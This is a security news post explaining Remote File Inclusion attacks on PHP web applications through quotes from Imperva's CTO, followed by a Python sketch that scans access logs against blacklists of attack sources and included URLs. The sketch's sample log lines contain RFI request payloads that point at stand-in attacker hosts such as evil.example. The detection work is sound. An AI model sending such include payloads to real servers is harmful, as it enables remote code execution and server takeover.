The first of what will be a monthly inside scope looks at an attack that usually flies under the radar: Remote File Inclusion (RFI).
Amichai Shulman, Imperva's co-founder and CTO, believes, "Although these attacks have the potential to cause as much damage as the more popular SQL Injection and Cross-Site Scripting (XSS) attacks, they are not widely discussed and they need to be!"
Speaking about the attack format itself, Amichai explains, "Remote File Inclusion (RFI) is an attack that targets the computer servers that run web sites and their applications. RFI usually exploits the PHP programming language, used by many large firms including Facebook and SugarCRM. RFI works by exploiting applications that reference files hosted on different servers and, as PHP doesn't properly sanitise the input to these requests, an RFI attack replaces these references with links to websites that are under the attacker's control and can be used for temporary data theft or manipulation, or for a long-term takeover of the vulnerable server."
Amichai provides the following advice, "The most common protection mechanism against RFI attacks is based on signatures for known vulnerabilities in the Web application. From our observations, it is apparent that we can improve the detection and blocking of such attacks by creating a blacklist of attack sources and a blacklist of URLs of remotely included malicious scripts. Having advance knowledge of RFI attack sources allows the WAF to block an attack before it even begins. Creating a blacklist of the referenced URLs enables the WAF to block exploits targeting zero-day vulnerabilities of applications. Finally, the blacklist of IPs constructed from the RFI attack observations could be used to block other types of attacks issued from the same malicious sources."
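The two-feed approach described above (a blacklist of attack sources plus a blacklist of remotely included URLs) can be sketched as a small detection pass over web-server access logs. This is an added illustration, not Imperva's or the HII report's code; the blacklists, log lines, hosts and IP addresses are constructed, and the verdict names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl
# Constructed blacklists standing in for the two WAF feeds the post describes:
# known RFI attack sources and URLs of remotely included malicious scripts.
BLACKLISTED_SOURCE_IPS = {"203.0.113.7"}
BLACKLISTED_INCLUDE_URLS = {"http://badhost.example/inc.txt"}
# Schemes that make a PHP include() of a user-supplied value fetch remote content.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "data", "php"}
# Common/combined log format: client IP first, then the quoted request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

def remote_include_params(query):
    """Return (name, canonical_url) for query parameters whose value is a remote URL.
    Canonical form lowercases scheme and host and drops query string and fragment."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        p = urlsplit(value)
        if p.scheme.lower() in REMOTE_SCHEMES:
            hits.append((name, f"{p.scheme.lower()}://{p.netloc.lower()}{p.path}"))
    return hits

def classify(src_ip, target):
    """Source blacklist first, then include-URL blacklist, then alert on any other remote include."""
    if src_ip in BLACKLISTED_SOURCE_IPS:
        return "block:source"
    hits = remote_include_params(urlsplit(target).query)
    if not hits:
        return "allow"
    if any(url in BLACKLISTED_INCLUDE_URLS for _, url in hits):
        return "block:url"
    return "alert:remote-include"

def scan_log(lines):
    """Parse access-log lines; return [(src_ip, target, verdict)] for each parsable line."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ip, _method, target = m.groups()
            results.append((ip, target, classify(ip, target)))
    return results

# Constructed sample log lines (RFC 5737 documentation addresses, .example hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php?page=http://evil.example/c.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2024:13:55:37 +0000] "GET /index.php?page=HTTP://BadHost.example/inc.txt?x=1 HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Oct/2024:13:55:38 +0000] "GET /index.php?page=ftp://unknown.example/x.txt HTTP/1.1" 200 512',
    '192.0.2.5 - - [10/Oct/2024:13:55:39 +0000] "GET /index.php?page=about HTTP/1.1" 200 512',
]
```

The third sample line shows the gap the post is pointing at: a remote include that matches neither feed is only alerted on, so the URL blacklist is worth feeding back from such alerts.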
Imperva's HII has documented examples of automated attack campaigns launched in the wild. The report pinpoints their common traits and techniques, as well as the role blacklisting can play in mitigating them, and can be viewed by visiting blog.imperva.com.